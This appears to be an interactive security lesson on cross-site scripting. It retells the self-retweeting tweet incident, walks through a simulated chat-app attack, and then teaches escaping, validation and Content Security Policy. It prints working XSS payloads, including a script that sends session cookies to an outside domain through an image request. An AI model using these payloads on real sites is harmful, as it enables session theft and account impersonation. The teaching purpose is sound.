Cross-site scripting (XSS)
Executing untrusted code in a trusted context.
Select your ecosystem
What is XSS?
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website. Since the script came from a trusted website, it cannot be distinguished from a legitimate script.
About this lesson
In this lesson we will demonstrate how an XSS attack can play out in a chat application. Next, we will dive deeper and explain the various forms of XSS. Finally, we will study vulnerable code and learn how to fix it.
But before we jump into the lesson, have you ever heard of a self-retweeting tweet?
A self-retweeting tweet
In 2014, an Austrian teenager @firoxl was experimenting with his feed on Twitter, trying to make it display the Unicode ‘heart’ character. By doing so, he inadvertently discovered that Twitter’s feed was vulnerable to an XSS attack! @firoxl immediately reported the issue to Twitter, but it was too late. His discovery was already making rounds on social media.
Less than two hours after @froxl’s discovery, a German IT student @derGeruhn published a Tweet that exploited XSS to ... retweet itself. Thus, the self-retweeting tweet was released into the world. It retweeted itself hundreds of thousands of times and affected thousands of Twitter accounts, including @NYTimes and @BBCBreaking. To end its reign, Twitter had to take their whole feed offline.
On the left you will find an image that shows the content of the self-retweeting tweet. The tweet contains malicious JavaScript code which gets executed every time someone views the tweet in their feed. The script accesses the HTML of the Twitter page, finds the “retweet” button, and presses it to retweet itself.
To achieve its nefarious purposes, the script exploits an XSS vulnerability. Not sure how it works? Read on!
Vulnerable chat application
A company called startup.io decided to deploy an internal chat application for their employees. However, instead of using Slack, Discord or similar, the company chose to create its own chat service.
You are an engineer working for startup.io, and you’ve just learnt about the self-retweeting tweet that plagued Twitter a few years ago. You are curious to see if you could exploit your company’s chat web application in a similar way. You inform your in-house security team and your manager about your intentions, and then you get to work.
Say hi to Emily
To exploit the application, you will be using a conversation with Emily, a fellow startup.io engineer. First, let’s be polite and inform Emily what we will be doing by sending her the following message: Hey! I will be stealing your cookies. Is that ok?
Hack 1: change the background color of the chat application
Since Emily seems relaxed about this whole stealing thing, let’s get down to business. You recall that in Twitter’s hack, the feed was exploited by tweeting a <script>
tag. You decide to do something similar. You choose to try something easy first–changing the background color of the chat application. Send Emily the following message:
<style> * { background-color: #FFFF00 } </style>
Woohoo, it worked! The background color of your chat changed to yellow. Judging from Emily’s reaction, you also managed to modify the background colour of her chat client!
Modifying the HTML, CSS, or JavaScript of a website that you view in your browser is nothing special–you can do it any time by poking in your browser’s console. However, changing what other people see or run within their browsers is a severe security issue!
If this new yellow background hurts your eyes as much as it hurts Emily’s, try changing it back to the default color (hex code #F7F3F3
).
Copy and paste this above: <style> * { background-color: #F7F3F3 } </style>
Hack 2: stealing cookies
A simple hack worked, so it’s time to be more vicious and actually steal some cookies! Try sending the following message:
<script>document.getElementById("messageText").innerHTML=document.cookie;document.getElementById("sendMessage").click();</script>
The first statement of the script retrieves cookies set by the chat web application and puts the cookies into a message box. The second statement clicks on the “send message” button.
Try sending the script as a message in the chat app. You should see two long strings with a session token popping up in the chat window, one sent by you and one sent by Emily.
Congratulations! You’ve managed to inject a malicious script into a web application, and that malicious script was run inside another user’s browser. As a result, you’ve stolen another user’s session id, which you could use to impersonate that user and do further harm.
In this example, we crafted a JavaScript payload that messaged the cookies to the chat. Unfortunately, Emily would quickly realize that something is off. In a more realistic scenario, you would want to be more stealthy about your activities. For example, you could send the following message:
<script>new Image().src="http://yourdomain.io/"+document.cookie;</script>
This script constructs an invisible image object which calls the provided src URL the moment the image is created. Effectively, we issue an HTTP request with the cookie’s content in the URL to a domain of our choice. All you need to do is log all incoming requests to that domain. This way, it is much less likely that Emily would notice anything suspicious.
Same-origin policy
To understand what happened with the chat application, we need to take a quick detour and explain how the browser executes HTML and JavaScript. Each time you visit a website, your browser downloads HTML, CSS, and JavaScript from the server that hosts the website. The browser interprets and displays HTML and CSS and executes JavaScript.
JavaScript is a powerful programming language–for example, it is entirely possible to use it to mine bitcoins inside your browser. However, by design, when a piece of JavaScript is downloaded from a website, it can only access secrets (e.g. cookies) associated with that website. For instance, JavaScript code downloaded from startup.io cannot access cookies set by yourbank.com. If it could, it would be straightforward to steal sensitive information persisted by other websites, such as session tokens.
This isolation is called the “same-origin policy“, and it is enforced by the browser. In a nutshell, XSS is a vulnerability that breaks the same-origin policy. And that’s what we did when we compromised the chat application. To understand what exactly happened, let’s take a look at the server code responsible for storing and displaying a chat message.
What is the impact of XSS?
XSS allows hackers to inject malicious JavaScript into a web application. Such injections are extremely dangerous from the security perspective, and can lead to:
- Stealing sensitive information, including session tokens, cookies or user credentials
- Injecting multiple types of malware (e.g. worms) into the website
- Changing the website appearance to trick users into performing undesirable actions
In addition, XSS is likely the most common web vulnerability. Do not take it lightly. Read on to learn how to mitigate XSS in your application.
1. Find places where user input gets injected into a response
XSS is extremely popular for a reason: we programmers very often inject user-supplied data into the responses we send back to users. The first step to mitigate XSS is to find all places in your code where this pattern occurs. Input data might be coming from a database or directly from a user request. Any data which might have originated from a user at any point in the past is a suspect.
This is a daunting task and requires you to review your code carefully. Luckily, security scanners such as Snyk Code can automate most of the work for you.
2. Escape the output
Having identified all the places where XSS might be happening, it’s time to get your hands dirty and code your way out of danger. The first and the most important XSS mitigation step is to escape your HTML output. To do that, you should HTML-encode all dangerous characters in the user-controlled data before injecting that data into your HTML output.
For example, when HTML-encoded, the character <
becomes <
, and the character &
becomes &
etc. This way, the browser will safely handle the HTML-encoded characters, i.e. it will not assume they are part of the HTML structure of your page.
Remember to encode all dangerous characters. Don’t assume only a subset of characters needs to be escaped for your specific use case. Bad guys are very creative and will always find ways to bypass your assumptions.
Instead of writing an escape function by yourself, use a well-proven library such as lodash.escape.
3. Perform input validation
Be as strict as possible with the data you receive from your users. Before including user-controlled data in an HTTP response or writing it to a database, validate it is in the format you expect. Never rely on blocklisting—the bad guys will always find ways to bypass it!
For instance, in our chat application, we expect the messageId to be a valid UUID and the senderEmail to be a valid email. Note that in the example we changed generateMessageHTML to generateSenderHTML. This demonstrates two layers of defence to prevent XSS with the senderEmail parameter: we both validate it before saving it to a database and later escape it when injecting it into HTML.
We can use validator.js, which has validation functions for many common data types.
It is mandatory to perform type validation of user input before writing it to a database. However, it is also strongly recommended to validate data after reading it from the database. This can save us when the database gets compromised, and the malicious data gets injected through means other than the vulnerable API we secured in the previous paragraph. To validate data read from a database, you can use the validation techniques we presented above. Alternatively, we recommend using trusted database libraries that perform type validation out of the box, for example, ORM libraries.
4. Don’t put user input in dangerous places
The above mitigation is effective against situations where user input is used as the content of an HTML element (e.g. <div> user_input </div>
or <p> user_input </p>
etc.). However, there are certain locations where you should never put a user-controlled input. These locations include:
- Inside the
<script>
tag - Inside CSS (e.g. inside the
<style>
tag) - Inside an HTML attribute (e.g.
<div attr=user_input>
)
There are some exceptions to the above rules, but explaining them goes beyond the scope of this lesson. If you do need to place user-controlled input inside any of the listed locations, please follow the OWASP Prevention Cheat Sheet for a more detailed advice.
Content Security Policy (CSP)
A Content Security Policy (CSP) is a security feature implemented by web browsers to mitigate various types of web-based attacks, such as cross-site scripting (XSS) and data injection attacks. It is a set of directives that a web application can define to control which sources of content are considered legitimate and safe to load and execute. These sources can include scripts, stylesheets, images, fonts, and other types of resources.
The main purpose of CSP is to prevent unauthorized or malicious code from being executed in the context of a web page. It helps in reducing the impact of vulnerabilities like XSS attacks, where attackers try to inject malicious scripts into a website to steal user data or perform other malicious actions. By specifying the sources of allowed content, CSP instructs the browser to only load content from trusted origins and domains, thereby blocking any content from untrusted sources.
CSP policies are typically defined using a combination of content source directives in the HTTP header of the web page or within a meta tag in the HTML. The policy directives can specify which domains are allowed for scripts, styles, images, fonts, and more. For example, you might define a CSP policy that only allows scripts to be loaded from the same origin as the web page itself or from a few specified trusted domains.
Here's a simplified example of a CSP policy:
Content-Security-Policy: default-src 'self' https://trusted-site.example;
In this example, the default-src directive specifies that content (such as scripts) can be loaded from the same origin ('self') and from https://trusted-site.example
, but any other sources will be blocked.
CSP is an important security mechanism that web developers can use to reduce the attack surface of their applications and protect users from various types of web vulnerabilities. It's worth noting that while CSP provides strong security benefits, it can also be complex to implement correctly, as it requires careful consideration of the sources and dependencies of content within a web application.
Test your knowledge!
Keep learning
To learn more about XSS, check out some other great content produced by Snyk:
- Our article post which explains reflected and DOM-based XSS in more detail
- A real-life example of XSS found in a popular JavaScript package
- Our most recent The State of Open Source Security report to see empirical data on how widespread XSS is